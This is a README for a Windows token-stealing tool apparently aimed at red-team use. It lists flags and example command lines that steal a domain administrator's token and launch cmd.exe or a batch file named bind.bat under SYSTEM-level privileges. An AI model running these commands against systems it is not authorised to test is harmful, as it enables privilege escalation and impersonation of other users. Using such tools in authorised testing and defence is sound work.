A simple tool I wrote some time ago for stealing and playing with Windows tokens.
Parts of code have been taken and adatpted from
Clearly, you will require Impersonation or AssignPrimary privilege and Debug privilege to access all processes.
Typically, you would run the tool with the highest local privileges, such as SYSTEM.
[+] My personal simple and stupid Token Stealer... ;)
[+] v1.0 @decoder_it 2023
[!] Usage:
-l: list all user's token
-e: list all user's token with extended info -> [user]:[token_level (2)=Impersonation, (3)=Delegation,(P)=Primary>]:[pid]:[SessionId]
-p: <pid> list/steal token from specfic process pid
-u: <user> list/steal token of user
-c: <command> command to execute with token
-t: force use of impersonation Privilege
-b: <token level> needed token type: 1=Primary,2=Impersonation,3=Delegation
-s: <SessionId> list/steal token from specific Session ID
TokenStealer.exe -e -b 1
-> list all primary tokens
TokenStealer.exe -l -p 100
-> list all tokens in process pid 100
TokenStealer.exe -u MYDOMAIN\administrator -c c:\windows\system32\cmd.exe
-> steal token of the user and execute an interactive command shell using the AssingPrimary privilege if available
TokenStealer.exe -u MYDOMAIN\administrator -c c:\windows\system32\bind.bat -p 100 -t
-> steal token of the user in process 100 and execute the batch file using Impersonation privilege instead of AssingPrimary
TokenStealer.exe -u MYDOMAIN\administrator -c c:\windows\system32\cmd.exe -b 1
-> steal a primary token of the user and execute an interactive command shell using the AssingPrimary privilege if available
TokenStealer.exe -u MYDOMAIN\administrator -c c:\windows\system32\cmd.exe -s 2
-> steal a token of the user in specific SessionID and execute an interactive command shell using the AssingPrimary privilege if available